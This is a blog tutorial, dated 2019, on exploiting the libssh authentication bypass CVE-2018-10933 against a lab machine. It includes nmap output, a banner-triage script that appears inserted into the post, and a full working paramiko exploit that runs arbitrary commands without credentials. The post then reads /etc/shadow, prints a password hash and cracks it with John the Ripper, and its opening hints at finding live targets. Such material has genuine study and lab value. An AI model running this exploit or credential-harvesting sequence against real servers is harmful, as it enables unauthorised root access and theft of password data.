Practical Computing Advice and Tutorials

Tue: 23 Jul 2019

CVE-2018-10933

Here, I'm going to demonstrate how you can exploit any server that is running a vulnerable version of libssh.

This vulnerability has the CVE ID CVE-2018-10933 and can be found in the wild, but there is only a short window in which this exploit is usable before the systems are patched.

Before you read any further, this demonstration contains no live targets; those you will have to work for, in order to get. What we can do, in the lab, is to set up a target computer and have it run an OS that is running this vulnerable version of libssh.

To follow along, you'll need to be able to create a bootable device such as a CD, a DVD or a USB device, and then grab this ISO disk image, from which to create your bootable device. Hint... you can find all the information you need, right here on this website. ;)

In fact, this demonstration pools many of the topics for which I have already created content (the CLI, Python scripting and such), so if you don't fully understand this post, a little more reading may be required; I'm sure it's all covered, but let me know if it's not.

You'll discover that the ISO runs as a live distro, from RAM; no install required. You can run it on a headless box or, for convenience, something with tty terminal access. I'm using an old laptop on which to run the ISO.

Now, you know that there's a new server on your LAN, because you've just put it there. So, a good tool with which to gather some intel on this new server, is nmap, or for the less intrepid, like me, Zenmap; each to their own. What you need is some intel on the target. On my LAN, I discovered this...

Nmap scan report for 192.168.0.9

Host is up (0.0055s latency).

Not shown: 99 closed ports

PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
MAC Address: 00:00:39:77:F7:D9 (Toshiba)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.6
Network Distance: 1 hop

A little more digging, with Zenmap, reveals...

PORT STATE SERVICE VERSION
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-libssh_0.8.3
| ssh-hostkey:
|_ 2048 e4:e5:e5:55:33:14:5a:16:19:18:de:ed:96:5a:2a:ec (RSA)

Bingo! The banner of a vulnerable libssh version (0.8.3).
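Before reaching for the exploit, a defender wants the same banner check run across a whole nmap report, so here is an added Python 3 example (mine, not the post's script) that pulls each host's SSH identification string out of `-sV` output and flags server versions in the ranges the libssh advisory lists as affected (0.6.0 up to 0.7.6, and 0.8.0 up to 0.8.4). The sample report embedded below is constructed: the first host is the one from this post, the other two are made up. The version string is upstream's, so a distribution that backported the fix without bumping it will still be flagged; treat a hit as "check the installed package", and remember the bug is in libssh's server code only.

```python
import re

# Server versions affected by CVE-2018-10933, per the libssh advisory:
# 0.6.0 <= v < 0.7.6 and 0.8.0 <= v < 0.8.4.
VULNERABLE_RANGES = (((0, 6, 0), (0, 7, 6)), ((0, 8, 0), (0, 8, 4)))

LIBSSH_RE = re.compile(r"SSH-2\.0-libssh[_-](\d+)\.(\d+)\.(\d+)")
ANY_BANNER_RE = re.compile(r"SSH-\d\.\d-\S+")
HOST_RE = re.compile(r"^Nmap scan report for (\S+)", re.M)


def parse_libssh_version(banner):
    """Return (major, minor, patch) from an SSH banner, or None if it is not libssh."""
    m = LIBSSH_RE.search(banner)
    return tuple(int(x) for x in m.groups()) if m else None


def is_vulnerable(banner):
    """True if the banner advertises a libssh server version in an affected range."""
    v = parse_libssh_version(banner)
    return v is not None and any(lo <= v < hi for lo, hi in VULNERABLE_RANGES)


def triage_nmap_report(text):
    """Map each host in an nmap -sV report to (banner, vulnerable); banner is None if absent."""
    result = {}
    # re.split with a capture group yields ['', host1, body1, host2, body2, ...].
    chunks = HOST_RE.split(text)
    for host, body in zip(chunks[1::2], chunks[2::2]):
        m = ANY_BANNER_RE.search(body)
        banner = m.group(0) if m else None
        result[host] = (banner, is_vulnerable(banner) if banner else False)
    return result


# Constructed sample: host .9 is the report from this post, the other two are invented.
SAMPLE_REPORT = """\
Nmap scan report for 192.168.0.9
22/tcp open ssh (protocol 2.0)
| fingerprint-strings:
|   NULL:
|_    SSH-2.0-libssh_0.8.3
Nmap scan report for 192.168.0.20
|_    SSH-2.0-libssh_0.8.4
Nmap scan report for 192.168.0.21
|_    SSH-2.0-OpenSSH_7.4
"""

if __name__ == "__main__":
    for host, (banner, vuln) in triage_nmap_report(SAMPLE_REPORT).items():
        print(f"{host:15} {banner or '-':25} {'VULNERABLE' if vuln else 'ok'}")
```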

We can now use this Python 3 script (it needs the paramiko module). You'll need to amend the IP address 192.168.0.9 to whatever the DHCP service gave the target on your LAN.

#!/usr/bin/python3

import sys
import socket
import paramiko

if len(sys.argv) != 2:
    sys.exit("usage: exploit.py '<command>'")

TARGET = ("192.168.0.9", 22)   # amend to the target's address on your LAN

s = socket.socket()
s.connect(TARGET)
t = paramiko.transport.Transport(s)
t.start_client()               # complete the key exchange like any normal client

# CVE-2018-10933: the vulnerable server accepts a client-sent USERAUTH_SUCCESS
# as if it had authenticated the client itself, so no credentials are needed.
m = paramiko.message.Message()
m.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
t._send_message(m)

c = t.open_session(timeout=5)
c.exec_command(sys.argv[1])
out = c.makefile("rb", 2048)
output = out.read()
out.close()
t.close()

# The channel returns bytes; decode them for display.
sys.stdout.write(output.decode(errors="replace"))

That script needs to be saved and then run with some arbitrary input, such as...
# python3 exploit.py "id"
# python3 exploit.py "ls -lta"

You'll maybe want to have a play around and discover what other commands produce some useful intel; I know I did.

One of the more useful commands is "cat /etc/shadow", which reveals the user name and hashed password...

pentesterlab:$1$vJgVtWtm$Hr5DsuFsvDrAUt4IiNNCK0

... which I then gave to John the Ripper.

Although John came up with the goods, it turns out that you can't simply log into the pentesterlab account over ssh, using the ripped password: it works only on the tty session.

So, we have the potential to do what we like with this server, given that we have root access.